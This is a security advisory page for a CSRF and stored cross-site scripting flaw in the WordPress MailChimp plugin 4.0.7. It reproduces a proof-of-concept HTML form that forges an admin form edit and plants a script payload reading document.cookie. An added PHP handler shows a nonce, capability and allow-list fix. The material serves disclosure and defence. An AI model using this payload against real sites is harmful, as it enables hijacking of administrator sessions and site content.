WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / XSS

2016.11.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################
# Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 4.0.7
# Date: 2016/11/19
######################
#
# PoC:
# I would like to disclose a CSRF and stored XSS vulnerability in the WordPress plugin MailChimp 4.0.7.
# Demo Construction : http://persian-team.ir/showthread.php?tid=192
# The Code for CSRF.html is :

<form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST">
  Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;" >
  <input type="submit" style="display: none; " />
  <input type="hidden" name="_mc4wp_action" value="edit_form" />
  <input type="hidden" name="mc4wp_form_id" value="60" />
  <input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" />
  <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&amp;view=edit-form&amp;form_id=60" />
  <h2>Form Fields</h2>
  <textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false"> <script>alert(document.cookie)</script><p> </textarea>
  <input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" />
  <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /></p>
</form>

#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
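The PoC above posts `_mc4wp_action`, `mc4wp_form_id`, a copied `_mc4wp_nonce` value and raw HTML in `mc4wp_form[content]`; the following added example (not the advisory's or the plugin's own code) shows how a WordPress admin save handler for that request rejects a forged submission and neutralises the stored payload: it checks capability, verifies the nonce against a per-form action so a value lifted into another user's page fails, and allow-lists the markup instead of storing it verbatim. The hook name, nonce action string, capability, allowed-tag list and post-based storage are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Hook name, nonce action string,
// capability and the allowed-tag list are assumptions for illustration.

// In the edit screen, emit a nonce tied to the current user and this form id:
//   wp_nonce_field( 'mc4wp_edit_form_' . $form_id, '_mc4wp_nonce' );

add_action( 'admin_post_mc4wp_example_edit_form', 'mc4wp_example_save_form' );

function mc4wp_example_save_form() {
    // Authorisation: only users allowed to manage the site may edit forms.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }

    // CSRF: verify the nonce against the form-specific action. A nonce copied
    // into an attacker-hosted page (as in CSRF.html) is bound to the user and
    // session that generated it, so it fails verification for any other user.
    $form_id = isset( $_POST['mc4wp_form_id'] ) ? absint( $_POST['mc4wp_form_id'] ) : 0;
    check_admin_referer( 'mc4wp_edit_form_' . $form_id, '_mc4wp_nonce' );

    // Stored XSS: the content field legitimately holds form markup, so apply an
    // allow-list instead of stripping all tags. <script>, on* event handlers and
    // javascript: URLs are not in the list and are removed by wp_kses().
    $allowed = array(
        'p'        => array( 'class' => true ),
        'br'       => array(),
        'label'    => array( 'for' => true, 'class' => true ),
        'input'    => array( 'type' => true, 'name' => true, 'value' => true, 'id' => true,
                             'class' => true, 'placeholder' => true, 'required' => true ),
        'select'   => array( 'name' => true, 'id' => true, 'class' => true ),
        'option'   => array( 'value' => true, 'selected' => true ),
        'textarea' => array( 'name' => true, 'id' => true, 'rows' => true, 'cols' => true ),
        'button'   => array( 'type' => true, 'class' => true ),
    );
    $form    = isset( $_POST['mc4wp_form'] ) ? wp_unslash( (array) $_POST['mc4wp_form'] ) : array();
    $name    = sanitize_text_field( isset( $form['name'] ) ? $form['name'] : '' );
    $content = wp_kses( isset( $form['content'] ) ? $form['content'] : '', $allowed );

    // Persist. Storing each sign-up form as a post is an assumption for this example.
    wp_update_post( array(
        'ID'           => $form_id,
        'post_title'   => $name,
        'post_content' => $content,
    ) );

    wp_safe_redirect( wp_get_referer() );
    exit;
}
```

With this handler in place the textarea payload from the PoC is reduced to `<p> </p>` before it is stored, and the submission itself is refused unless the nonce was issued to the submitting user for form 60.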


Copyright 2018, cxsecurity.com